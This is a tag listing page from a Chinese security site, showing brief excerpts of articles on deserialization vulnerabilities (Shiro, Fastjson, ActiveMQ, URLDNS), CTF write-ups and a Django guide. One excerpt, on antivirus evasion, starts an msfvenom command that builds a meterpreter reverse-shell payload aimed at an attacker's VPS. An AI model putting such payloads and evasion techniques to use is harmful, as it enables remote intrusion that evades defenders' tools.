序列化 - 第 17 | CN-SEC 中文网

代码审计

shiro反序列化漏洞原理分析以及漏洞复现

扫码领资料获网安教程免费&进群Shiro-550反序列化漏洞（CVE-2016-4437）漏洞简介shiro-550主要是由shiro的rememberMe内容反序列化导致的命令执行漏洞，造成...

02月15日37 views评论

阅读全文

安全漏洞

Apache ActiveMQ RCE漏洞分析 (CNVD-2023-69477)

漏洞概述Apache ActiveMQ 中存在远程代码执行漏洞，具有 Apache ActiveMQ 服务器TCP端口（默认为61616）访问权限的远程攻击者可以通过发送恶意数据到服务器从而执行任意代...

02月15日30 views评论

阅读全文

安全文章

PHP&JAVA反序列化

点击蓝字关注我们PHP反序列化原理：序列化就是将对象转为字符串。反序列化与之相反，数据的格式的转换对象的序列化利于对象的保存和传输，也可以让多个文件共享对象技术：有类（触发魔术方法）；...

02月09日18 views评论

阅读全文

代码审计

Fastjson反序列化漏洞原理与漏洞复现

漏洞原理1.啥是json?json全称是JavaScript object notation。即JavaScript对象标记法，使用键值对进行信息的存储。举个简单的例子如下：{ "name":"Bos...

02月05日27 views评论

阅读全文

安全文章

打靶手记之hackmyvmUnbakedPie

lia之前virtualbox有点问题，今天解决了，今天继续更新hackmyvm。信息收集扫网段扫端口 192.168.56.102摘选一下有用信息：端口5003上运行的服务使用了WSGIServer...

02月05日41 views评论

阅读全文

安全漏洞

Shiro反序列化漏洞复现（文末领红包封面）

0x0声明由于传播、利用此文所提供的信息而造成的任何直接或间接的后果和损失，均由使用者本人承担，Cyb3rES3c及文章作者不承担任何责任。如有侵权烦请告知，我们将立即删除相关内容并致歉。请遵...

02月04日24 views评论

阅读全文

代码审计

代码审计-CVE-2023-6654-PHPEMS-加密-解密分析

本文来自团队小伙伴:c3ting 博客地址 https://c3ting.com 正文：路由：入口方法：鉴权分析：由此可以得出鉴权是由session类负责获取参数后，由各个类的魔术方法负责：...

02月03日63 views评论

阅读全文

安全百科

一篇文章说清楚URLDNS链

接上一篇讲到java原生的序列化和反序列化方法，这篇通过URLDNS链为例展开讲讲java原生序列化和反序列化的危害，以及通过URLDNS链的分析来简单入门反序列化漏洞的代码审计。java序列化和反序...

01月24日26 views评论

阅读全文

安全开发

保障代码安全：解析Java反序列化

免责声明本公众号着重分享技术内容，所提供信息旨在促进技术交流。对于因信息使用而引起的任何损失，本公众号及作者概不负责。请谨慎行事，安全至上。前言深入理解java反序列化漏洞并非一帆风顺的过程，因其涉及...

01月19日33 views评论

阅读全文

安全工具

Python免杀shellcode篇-反序列化过360核晶-火绒-Windows defender

反序列化+远程分离免杀+反沙箱首先也是通过 msfvenom -p windows/x64/meterpreter/reverse LHOST=你的vps地址 LPORT=4444 -f c -b ...

01月16日87 views评论

阅读全文

安全开发

【Django进阶】django-rest-framework中文文档——序列化器

搭建环境使用django-rest-framework中文文档——快速入门中的虚拟环境。新建snippets应用程序python .manage.py startapp snippets注册相关应用程...

01月10日19 views评论

阅读全文

CTF专场

极客大挑战JAVA题目WP

Java该题目源码位于 https://github.com/yaklang/yaklang/tree/geek2023) 分析打开后是一个登录框。登录登录是明文传输的，可以直接从源码看密码，也可以...

01月10日25 views评论

阅读全文

shiro反序列化漏洞原理分析以及漏洞复现

Apache ActiveMQ RCE漏洞分析 (CNVD-2023-69477)

PHP&JAVA反序列化

Fastjson反序列化漏洞原理与漏洞复现

打靶手记之hackmyvmUnbakedPie

Shiro反序列化漏洞复现（文末领红包封面）

代码审计-CVE-2023-6654-PHPEMS-加密-解密分析

一篇文章说清楚URLDNS链

保障代码安全：解析Java反序列化

Python免杀shellcode篇-反序列化过360核晶-火绒-Windows defender

【Django进阶】django-rest-framework中文文档——序列化器

极客大挑战JAVA题目WP

在线咨询

微信